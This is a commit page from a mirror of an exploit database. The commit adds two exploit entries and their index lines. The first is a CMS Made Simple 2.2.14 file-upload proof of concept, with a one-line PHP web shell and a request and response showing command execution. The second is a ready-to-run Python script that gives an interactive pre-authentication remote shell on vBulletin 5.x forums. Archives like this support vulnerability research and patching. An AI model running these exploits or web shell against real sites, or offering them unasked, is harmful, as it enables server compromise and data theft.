bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-08-13

Browse source 
2 changes to exploits/shellcodes

CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload
vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
This commit is contained in:
Offensive Security 2020-08-13 05:01:49 +00:00
parent eea08c4481
commit a999edcbb6
3 changed files with 97 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

53
exploits/php/webapps/48742.txt Normal file
View file

@ -0,0 +1,53 @@
# Exploit Title: CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)
# Google Dork: -
# Date: 2020-07-29
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip
# Version: 2.2.14
# Tested on: Linux Ubuntu 18.04
# CVE: N/A
1. Description:
----------------------
CMS Made Simple 2.2.14 allows Authenticated Arbitrary File Upload because the File Manager does not block .ptar and .phtml files. A malicious user can perform remote code execution.
2. Proof of Concept:
----------------------
- Create .phtml or .ptar file with malicious PHP payload;
- Upload .phtml or .ptar file in the 'File Manager' module;
- Click on the uploaded file to perform remote code execution.
3: Example payload:
----------------------
<?php system($_GET['cmd']);?>
4a: Burp request:
----------------------
GET /cmsms/uploads/rce.phtml?cmd=id HTTP/1.1
Host: 10.10.10.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: d2f3b04a992e92af78d4f451813df40fa6f4f4b4=2c462b984c95aa0a8d18f59e2dd21defb7d7e368%3A%3AeyJ1aWQiOjIsInVzZXJuYW1lIjoiUm9lbCIsImVmZl91aWQiOm51bGwsImVmZl91c2VybmFtZSI6bnVsbCwiaGFzaCI6IiQyeSQxMCQ4NS5qSy5nTTMxZmJEQmlGTXlIYlQuUUR5eFRDekpsSVFncjhOS1FMbDhBSUlIUjVYeVNJZSJ9; __c=e9ef732e78dc5a9f603; CMSSESSIDde72be53c754=71mvdcppeeunddtap69k26ia4v
Upgrade-Insecure-Requests: 1
4b: Burp response:
----------------------
HTTP/1.1 200 OK
Date: Thu, 30 Jul 2020 23:14:47 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 54
Connection: close
Content-Type: text/html; charset=UTF-8
uid=33(www-data) gid=33(www-data) groups=33(www-data)

42
exploits/php/webapps/48743.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
# Date: 2020-08-09
# Exploit Author: @zenofex
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: None
# Version: 5.4.5 through 5.6.2
# Tested on: vBulletin 5.6.2 on Ubuntu 19.04
# CVE : None
# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code
# execution vulnerability caused by incomplete patching of the previous
# "CVE-2019-16759" RCE. This logic bug allows for a single pre-auth
# request to execute PHP code on a target vBulletin forum.
#More info can be found at:
#https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
#!/usr/bin/env python3
# vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex
import argparse
import requests
import sys
def run_exploit(vb_loc, shell_cmd):
post_data = {'subWidgets[0][template]' : 'widget_php', 'subWidgets[0][config][code]' : "echo shell_exec('%s'); exit;" % shell_cmd}
r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data)
return r.text
ap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE')
ap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.')
ARGS = ap.parse_args()
while True:
try:
cmd = input("vBulletin5$ ")
print(run_exploit(ARGS.location, cmd))
except KeyboardInterrupt:
sys.exit("\nClosing shell...")
except Exception as e:
sys.exit(str(e))

2
files_exploits.csv
View file

@ -42983,3 +42983,5 @@ id,file,description,date,author,type,platform,port
48738,exploits/php/webapps/48738.txt,"Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password)",2020-08-10,boku,webapps,php, 48738,exploits/php/webapps/48738.txt,"Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password)",2020-08-10,boku,webapps,php,
48739,exploits/java/webapps/48739.txt,"ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)",2020-08-10,"Bhadresh Patel",webapps,java, 48739,exploits/java/webapps/48739.txt,"ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)",2020-08-10,"Bhadresh Patel",webapps,java,
48741,exploits/php/webapps/48741.txt,"Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)",2020-08-11,"Roel van Beurden",webapps,php, 48741,exploits/php/webapps/48741.txt,"Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)",2020-08-11,"Roel van Beurden",webapps,php,
48742,exploits/php/webapps/48742.txt,"CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload",2020-08-12,"Roel van Beurden",webapps,php,
48743,exploits/php/webapps/48743.txt,"vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution",2020-08-12,zenofex,webapps,php,

Can't render this file because it is too large.